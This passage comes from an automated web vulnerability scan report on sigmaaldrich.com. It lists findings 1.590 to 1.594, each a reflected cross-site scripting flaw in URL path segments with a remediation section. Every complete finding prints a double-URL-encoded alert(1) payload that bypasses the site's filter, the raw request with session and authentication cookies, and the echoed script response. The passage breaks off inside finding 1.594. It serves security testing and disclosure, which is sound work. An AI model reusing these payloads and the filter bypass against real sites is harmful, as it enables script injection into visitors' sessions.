Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:45 GMT
Content-Length: 28922
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science/dda9b";alert(1)//fe8e88d2785","E404") ;
   </script>
...[SNIP]...

1.590. http://www.sigmaaldrich.com/materials-science/metal-and-ceramic-science.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/metal-and-ceramic-science.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efeb4%2522%253balert%25281%2529%252f%252ff9c67401f90 was submitted in the REST URL parameter 1. This input was echoed as efeb4";alert(1)//f9c67401f90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-scienceefeb4%2522%253balert%25281%2529%252f%252ff9c67401f90/metal-and-ceramic-science.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:43 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-scienceefeb4";alert(1)//f9c67401f90/metal-and-ceramic-science.html","E404") ;
   </script>
...[SNIP]...

1.591. http://www.sigmaaldrich.com/materials-science/metal-and-ceramic-science.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/metal-and-ceramic-science.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52dd3%2522%253balert%25281%2529%252f%252f97d6f88434a was submitted in the REST URL parameter 2. This input was echoed as 52dd3";alert(1)//97d6f88434a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science/52dd3%2522%253balert%25281%2529%252f%252f97d6f88434a HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:46 GMT
Content-Length: 28922
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science/52dd3";alert(1)//97d6f88434a","E404") ;
   </script>
...[SNIP]...

1.592. http://www.sigmaaldrich.com/materials-science/micro-and-nanoelectronics.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/micro-and-nanoelectronics.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74b21%2522%253balert%25281%2529%252f%252f69dcd533ce2 was submitted in the REST URL parameter 1. This input was echoed as 74b21";alert(1)//69dcd533ce2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science74b21%2522%253balert%25281%2529%252f%252f69dcd533ce2/micro-and-nanoelectronics.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:45 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science74b21";alert(1)//69dcd533ce2/micro-and-nanoelectronics.html","E404") ;
   </script>
...[SNIP]...

1.593. http://www.sigmaaldrich.com/materials-science/micro-and-nanoelectronics.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/micro-and-nanoelectronics.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d8b0%2522%253balert%25281%2529%252f%252f28e6eb265e0 was submitted in the REST URL parameter 2. This input was echoed as 9d8b0";alert(1)//28e6eb265e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science/9d8b0%2522%253balert%25281%2529%252f%252f28e6eb265e0 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:47 GMT
Content-Length: 28922
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science/9d8b0";alert(1)//28e6eb265e0","E404") ;
   </script>
...[SNIP]...

1.594. http://www.sigmaaldrich.com/materials-science/nanomaterials.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/nanomaterials.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43b7f%2522%253balert%25281%2529%252f%252f55e6c486fe4 was submitted in the REST URL parameter 1. This input was echoed as 43b7f";alert(1)//55e6c486fe4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science43b7f%2522%253balert%25281%2529%252f%252f55e6c486fe4/nanomaterials.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; 